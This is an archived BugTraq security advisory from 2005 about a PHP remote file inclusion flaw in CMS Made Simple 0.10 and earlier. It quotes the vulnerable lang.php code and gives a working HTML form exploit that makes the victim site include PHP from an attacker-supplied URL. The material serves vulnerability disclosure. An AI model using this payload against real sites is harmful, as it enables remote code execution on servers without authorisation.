BugTraq
CMS Made Simple <= 0.10 - PHP injection Aug 31 2005 07:18PM
groszynskif gmail com (1 replies)
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: CMS Made Simple - PHP injection
Version <= 0.10
Homepage: http://www.cmsmadesimple.org/

Author: Filip Groszynski (VXSfx)
Date: 31 August 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Background:

CMS Made Simple is an easy to use content managment
system for simple stable content site. Uses PHP, MySQL
and Smarty templating system.

--------------------------------------------------------

Vulnerable code exist in ./admin/lang.php:

<?php
...
$current_language = "en_US";
#Only do language stuff for admin pages
[!] if (isset($CMS_ADMIN_PAGE)) {
...
#Check to see if there is already a language in use...
if (isset($_POST["change_cms_lang"])) {
[!] $current_language = $_POST["change_cms_lang"];
setcookie("cms_language", $_POST["change_cms_lang"]);
} else if (isset($_COOKIE["cms_language"])) {
$current_language = $_COOKIE["cms_language"];
}
else {
...
}

#Ok, we have a language to load, let's load it already...
if (isset($nls['file'][$current_language])) {
foreach ($nls['file'][$current_language] as $onefile) {
[!] include($onefile);
}
}
...
}
...
?>
--------------------------------------------------------

Exploit:

example.html:
<form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx
][vxsfx]=(__URL__)" method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF

--------------------------------------------------------

Contact:

Author: Filip Groszynski (VXSfx)
Location: Poland <Warsaw>
Email: groszynskif <|> gmail <|> com

-- == -- == -- == -- == -- == -- == -- == -- == -- == --

[ reply ]
Re: CMS Made Simple <= 0.10 - PHP injection Sep 05 2005 10:02PM
garaged (garaged gmail com)


 

Privacy Statement
Copyright 2010, SecurityFocus